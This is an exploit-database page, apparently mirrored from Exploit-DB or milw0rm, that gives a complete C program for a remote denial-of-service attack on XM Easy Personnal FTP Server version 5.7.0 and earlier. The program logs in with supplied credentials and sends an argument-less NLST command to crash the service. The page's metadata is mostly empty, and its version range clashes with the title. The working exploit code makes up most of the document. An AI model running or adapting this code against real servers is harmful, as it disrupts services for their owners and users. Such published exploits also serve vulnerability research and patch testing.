header-logo
Suggest Exploit
vendor:
XM Easy Personnal FTP Server
by:
Jonathan Salwan
N/A
CVSS
N/A
Denial of Service
N/A
CWE
Product Name: XM Easy Personnal FTP Server
Affected Version From: 5.7.2000
Affected Version To: 5.7.2000
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

XM Easy Personnal FTP Server <= 5.7.0 Remote Denial of Service with Request (NLST)

The vulnerability is caused due to an error in handling the NLST command. This can be exploited to crash the FTP service by sending the "NLST" with NULL argument.

Mitigation:

N/A
Source

Exploit-DB raw data:

/*
XM Easy Personnal FTP Server <= 5.7.0
Remote Denial of Service with Request (NLST)

---------------------------------------------------------------------------------------------------------
The vulnerability is caused due to an error in handling the NLST command. This can be exploited to crash 
the FTP service by sending the "NLST" with NULL argument.
---------------------------------------------------------------------------------------------------------

Author: Jonathan Salwan
Mail  : submit [AT] shell-storm.org
Web   : http://www.shell-storm.org
*/

#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"

int syntax(char *file)
	{
	fprintf(stderr,"XM Easy Personnal FTP Server <= 5.7.0\n");
	fprintf(stderr,"=>Syntax  : <%s> <ip> <port> <login> <passwd>\n",file);
	fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 password1\n",file); 
	exit(0);
	}

int main(int argc, char **argv)
{
	if (argc < 4)
		syntax(argv[0]);
	
	int port = atoi(argv[2]);

	int mysocket;
	int mysocket2;
	int srv_connect;
	int sockaddr_long;


		struct sockaddr_in sockaddr_mysocket;
		sockaddr_long = sizeof(sockaddr_mysocket);
		sockaddr_mysocket.sin_family = AF_INET;
		sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
		sockaddr_mysocket.sin_port = htons(port);

        char request[50];
	char answer[200];

        fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);

                mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
                        if(mysocket2 == -1){
                        fprintf(stderr,"[-]FAILED SOCKET\n");
			return 1;}

	srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);
		
	if (srv_connect != -1)
 		{	

                memset(answer,0,200);
	        recv(mysocket2,answer,sizeof(answer),0);

		sprintf(request, "USER %s\r\n", argv[3]);		
			if (send(mysocket2,request,strlen(request),0) == -1){
				fprintf(stderr,"[-]Send Request USER\t\t[FAILED]\n");
				shutdown(mysocket2,1);
				return 1;}
			else{
				memset(answer,0,200);
				recv(mysocket2,answer,sizeof(answer),0);
				}
		
		sprintf(request, "PASS %s\r\n", argv[4]);
		                if (send(mysocket2,request,strlen(request),0) == -1){
		                        fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");
		                        shutdown(mysocket2,1);
		                        return 1;}
		                else{ 
					memset(answer,0,200);
		                        recv(mysocket2,answer,sizeof(answer),0);
		                 }
                sprintf(request, "NLST\r\n");
                        if (send(mysocket2,request,strlen(request),0) == -1){
                                fprintf(stderr,"[-]Send Request NLST\t\t[FAILED]\n");
                                shutdown(mysocket2,1);
                                return 1;}
			
		}
	else{
		fprintf(stderr,"[-]Connect\t\t[FAILED]\n");
		shutdown(mysocket2,1);
		return 1;}


	shutdown(mysocket2,1);


fprintf(stdout,"[+]Done! %s has been Crashed\n", argv[1]);
return 0;
}

// milw0rm.com [2009-03-27]

Navigation

Suggest Exploit

Services By CQR